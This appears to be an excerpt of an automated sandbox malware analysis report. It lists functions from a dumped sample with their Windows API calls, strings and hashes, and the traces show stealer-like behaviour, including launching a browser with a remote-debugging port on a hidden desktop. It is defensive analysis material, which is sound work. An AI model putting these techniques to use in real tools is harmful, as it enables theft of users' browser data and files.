                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: b8c8574fb560cabc1709a82818986c3936af60de9d81e733b950c944f6f40a89
                            • Instruction ID: e57ca3da578a361038e048b1e9dd285904c0975652ee5d91da0a6ac70f062cc0
                            • Opcode Fuzzy Hash: b8c8574fb560cabc1709a82818986c3936af60de9d81e733b950c944f6f40a89
                            • Instruction Fuzzy Hash: 0A12A271A103069BEB20EF75D989AAF77B9AF44304F14552EFC46D3260DB78DC418BA8
                            Function 0044CBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0044CBFC
                            • FindFirstFileA.KERNEL32(?,?), ref: 0044CC13
                            • lstrcat.KERNEL32(?,?), ref: 0044CC5F
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0044CC71
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 0044CC8B
                            • wsprintfA.USER32 ref: 0044CCB0
                            • PathMatchSpecA.SHLWAPI(?,00FF9260), ref: 0044CCE2
                            • CoInitialize.OLE32(00000000), ref: 0044CCEE
                              • Part of subcall function 0044CAE0: CoCreateInstance.COMBASE(0045B110,00000000,00000001,0045B100,?), ref: 0044CB06
                              • Part of subcall function 0044CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0044CB46
                              • Part of subcall function 0044CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0044CBC9
                            • CoUninitialize.COMBASE ref: 0044CD09
                            • lstrcat.KERNEL32(?,?), ref: 0044CD2E
                            • lstrlen.KERNEL32(?), ref: 0044CD3B
                            • StrCmpCA.SHLWAPI(?,0045CFEC), ref: 0044CD55
                            • wsprintfA.USER32 ref: 0044CD7D
                            • wsprintfA.USER32 ref: 0044CD9C
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 0044CDB0
                            • wsprintfA.USER32 ref: 0044CDD8
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0044CDF1
                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0044CE10
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 0044CE28
                            • CloseHandle.KERNEL32(00000000), ref: 0044CE33
                            • CloseHandle.KERNEL32(00000000), ref: 0044CE3F
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044CE54
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044CE94
                            • FindNextFileA.KERNEL32(?,?), ref: 0044CF8D
                            • FindClose.KERNEL32(?), ref: 0044CF9F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                            • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 3860919712-2388001722
                            • Opcode ID: 20937601f604d07906cd34e98432c9abf8a26da99e015a45179ce3033a01b7bc
                            • Instruction ID: 0f5dbbec9757f64cb61fb2eb1d53277a425444978af500c190392ee2d5c60c68
                            • Opcode Fuzzy Hash: 20937601f604d07906cd34e98432c9abf8a26da99e015a45179ce3033a01b7bc
                            • Instruction Fuzzy Hash: 67C18471A002089FDB60DF64DC85AEF777AAF48304F145599F90997290EF78AE44CF64
                            Function 00439770 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 234stringsleepCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 00439790
                            • lstrcat.KERNEL32(?,?), ref: 004397A0
                            • lstrcat.KERNEL32(?,?), ref: 004397B1
                            • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 004397C3
                            • memset.MSVCRT ref: 004397D7
                              • Part of subcall function 00453E70: lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00453EA5
                              • Part of subcall function 00453E70: lstrcpy.KERNEL32(00000000,00FFEE68), ref: 00453ECF
                              • Part of subcall function 00453E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0043134E,?,0000001A), ref: 00453ED9
                            • wsprintfA.USER32 ref: 00439806
                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00439827
                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00439844
                              • Part of subcall function 004546A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004546B9
                              • Part of subcall function 004546A0: Process32First.KERNEL32(00000000,00000128), ref: 004546C9
                              • Part of subcall function 004546A0: Process32Next.KERNEL32(00000000,00000128), ref: 004546DB
                              • Part of subcall function 004546A0: StrCmpCA.SHLWAPI(?,?), ref: 004546ED
                              • Part of subcall function 004546A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00454702
                              • Part of subcall function 004546A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00454711
                              • Part of subcall function 004546A0: CloseHandle.KERNEL32(00000000), ref: 00454718
                              • Part of subcall function 004546A0: Process32Next.KERNEL32(00000000,00000128), ref: 00454726
                              • Part of subcall function 004546A0: CloseHandle.KERNEL32(00000000), ref: 00454731
                            • memset.MSVCRT ref: 00439862
                            • lstrcat.KERNEL32(00000000,?), ref: 00439878
                            • lstrcat.KERNEL32(00000000,?), ref: 00439889
                            • lstrcat.KERNEL32(00000000,00464B60), ref: 0043989B
                            • memset.MSVCRT ref: 004398AF
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004398D4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00439903
                            • StrStrA.SHLWAPI(00000000,00FFF298), ref: 00439919
                            • lstrcpyn.KERNEL32(006693D0,00000000,00000000), ref: 00439938
                            • lstrlen.KERNEL32(?), ref: 0043994B
                            • wsprintfA.USER32 ref: 0043995B
                            • lstrcpy.KERNEL32(?,00000000), ref: 00439971
                            • memset.MSVCRT ref: 00439986
                            • Sleep.KERNEL32(00001388), ref: 004399E7
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431557
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431579
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 0043159B
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 004315FF
                              • Part of subcall function 004392B0: strlen.MSVCRT ref: 004392E1
                              • Part of subcall function 004392B0: strlen.MSVCRT ref: 004392FA
                              • Part of subcall function 004392B0: strlen.MSVCRT ref: 00439399
                              • Part of subcall function 004392B0: strlen.MSVCRT ref: 004393E6
                              • Part of subcall function 00454740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00454759
                              • Part of subcall function 00454740: Process32First.KERNEL32(00000000,00000128), ref: 00454769
                              • Part of subcall function 00454740: Process32Next.KERNEL32(00000000,00000128), ref: 0045477B
                              • Part of subcall function 00454740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0045479C
                              • Part of subcall function 00454740: TerminateProcess.KERNEL32(00000000,00000000), ref: 004547AB
                              • Part of subcall function 00454740: CloseHandle.KERNEL32(00000000), ref: 004547B2
                              • Part of subcall function 00454740: Process32Next.KERNEL32(00000000,00000128), ref: 004547C0
                              • Part of subcall function 00454740: CloseHandle.KERNEL32(00000000), ref: 004547CB
                            • CloseDesktop.USER32(?), ref: 00439A1C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                            • API String ID: 2040986984-1862457068
                            • Opcode ID: ef6d38daf4388e6c4deaa66acd07cfa996c676f3789a4ad843e087ab885ee697
                            • Instruction ID: 161b761cb94da918f5d4f48737b1ef0fef8a421c35a3005559729cbcd90011ad
                            • Opcode Fuzzy Hash: ef6d38daf4388e6c4deaa66acd07cfa996c676f3789a4ad843e087ab885ee697
                            • Instruction Fuzzy Hash: D8915271A10208AFDB10EFB4DC45FDE77B9AF48704F105199FA09A7291DAB4AE448BA4
                            Function 00441269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00441291
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004412B4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004412BF
                            • lstrlen.KERNEL32(00464CA8), ref: 004412CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004412E7
                            • lstrcat.KERNEL32(00000000,00464CA8), ref: 004412F3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044131E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 0044133A
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0044135C
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 00441376
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004413AF
                            • lstrcpy.KERNEL32(00000000,?), ref: 004413D7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004413E2
                            • lstrlen.KERNEL32(00461794), ref: 004413ED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044140A
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00441416
                            • lstrlen.KERNEL32(?), ref: 00441423
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441443
                            • lstrcat.KERNEL32(00000000,?), ref: 00441451
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044147A
                            • StrCmpCA.SHLWAPI(?,00FFDDB0), ref: 004414A3
                            • lstrcpy.KERNEL32(00000000,?), ref: 004414E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044150D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00441535
                            • StrCmpCA.SHLWAPI(?,00FFE390), ref: 00441552
                            • lstrcpy.KERNEL32(00000000,?), ref: 00441593
                            • lstrcpy.KERNEL32(00000000,?), ref: 004415BC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004415E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00441796
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004417BE
                            • lstrcpy.KERNEL32(00000000,?), ref: 004417F5
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0044181C
                            • FindClose.KERNEL32(00000000), ref: 0044182B
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: 85883c1bb870b8efeba611e1c671b637e8b1df11fbbb8ea4b52a07236eccde75
                            • Instruction ID: 0c2a46e213ebd64b7dda75720029e4187acbb30c8d43377e674d092de60ab557
                            • Opcode Fuzzy Hash: 85883c1bb870b8efeba611e1c671b637e8b1df11fbbb8ea4b52a07236eccde75
                            • Instruction Fuzzy Hash: DAC1B271A103069BEB21EF75DD89AAF77B9AF04304F14112AFC46D3261DB78DC458BA8
                            Function 0044E210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0044E22C
                            • FindFirstFileA.KERNEL32(?,?), ref: 0044E243
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0044E263
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 0044E27D
                            • wsprintfA.USER32 ref: 0044E2A2
                            • StrCmpCA.SHLWAPI(?,0045CFEC), ref: 0044E2B4
                            • wsprintfA.USER32 ref: 0044E2D1
                              • Part of subcall function 0044EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0044EE12
                            • wsprintfA.USER32 ref: 0044E2F0
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 0044E304
                            • lstrcat.KERNEL32(?,00FFFA58), ref: 0044E335
                            • lstrcat.KERNEL32(?,00461794), ref: 0044E347
                            • lstrcat.KERNEL32(?,?), ref: 0044E358
                            • lstrcat.KERNEL32(?,00461794), ref: 0044E36A
                            • lstrcat.KERNEL32(?,?), ref: 0044E37E
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0044E394
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E3D2
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E422
                            • DeleteFileA.KERNEL32(?), ref: 0044E45C
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431557
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431579
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 0043159B
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 004315FF
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0044E49B
                            • FindClose.KERNEL32(00000000), ref: 0044E4AA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                            • String ID: %s\%s$%s\*
                            • API String ID: 1375681507-2848263008
                            • Opcode ID: d27efa4881b0d57bb7ab3e765525375d04d72ae600373a868ee7b68a545b70ce
                            • Instruction ID: 132116ef945c939fd989fbf1f28c0f281b3d94464793104e9b5277a174f2dd6a
                            • Opcode Fuzzy Hash: d27efa4881b0d57bb7ab3e765525375d04d72ae600373a868ee7b68a545b70ce
                            • Instruction Fuzzy Hash: 6D81A3719002189FDB20EF75DD49AEF7779BF48304F00599AF90A93251EB78AA44CFA4
                            Function 004316B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004316E2
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00431719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043176C
                            • lstrcat.KERNEL32(00000000), ref: 00431776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004317A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 004318F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004318FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat
                            • String ID: \*.*
                            • API String ID: 2276651480-1173974218
                            • Opcode ID: d9a4e164484d9125c513cfb89dc36e72480501f29114419579155fc3d632f6fd
                            • Instruction ID: 928878dc458cd70ee094bd41e5be97bc0a5e68702c52933958e9199915fb4f1f
                            • Opcode Fuzzy Hash: d9a4e164484d9125c513cfb89dc36e72480501f29114419579155fc3d632f6fd
                            • Instruction Fuzzy Hash: 15819571A102069FCB21EF65DD85BAF77B9AF08305F14312AF805A7361DB789C01CBA9
                            Function 0044DD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0044DD45
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0044DD4C
                            • wsprintfA.USER32 ref: 0044DD62
                            • FindFirstFileA.KERNEL32(?,?), ref: 0044DD79
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0044DD9C
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 0044DDB6
                            • wsprintfA.USER32 ref: 0044DDD4
                            • DeleteFileA.KERNEL32(?), ref: 0044DE20
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0044DDED
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431557
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 00431579
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 0043159B
                              • Part of subcall function 00431530: lstrcpy.KERNEL32(00000000,?), ref: 004315FF
                              • Part of subcall function 0044D980: memset.MSVCRT ref: 0044D9A1
                              • Part of subcall function 0044D980: memset.MSVCRT ref: 0044D9B3
                              • Part of subcall function 0044D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0044D9DB
                              • Part of subcall function 0044D980: lstrcpy.KERNEL32(00000000,?), ref: 0044DA0E
                              • Part of subcall function 0044D980: lstrcat.KERNEL32(?,00000000), ref: 0044DA1C
                              • Part of subcall function 0044D980: lstrcat.KERNEL32(?,00FFF2E0), ref: 0044DA36
                              • Part of subcall function 0044D980: lstrcat.KERNEL32(?,?), ref: 0044DA4A
                              • Part of subcall function 0044D980: lstrcat.KERNEL32(?,00FFDE70), ref: 0044DA5E
                              • Part of subcall function 0044D980: lstrcpy.KERNEL32(00000000,?), ref: 0044DA8E
                              • Part of subcall function 0044D980: GetFileAttributesA.KERNEL32(00000000), ref: 0044DA95
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0044DE2E
                            • FindClose.KERNEL32(00000000), ref: 0044DE3D
                            • lstrcat.KERNEL32(?,00FFFA58), ref: 0044DE66
                            • lstrcat.KERNEL32(?,00FFE470), ref: 0044DE7A
                            • lstrlen.KERNEL32(?), ref: 0044DE84
                            • lstrlen.KERNEL32(?), ref: 0044DE92
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044DED2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
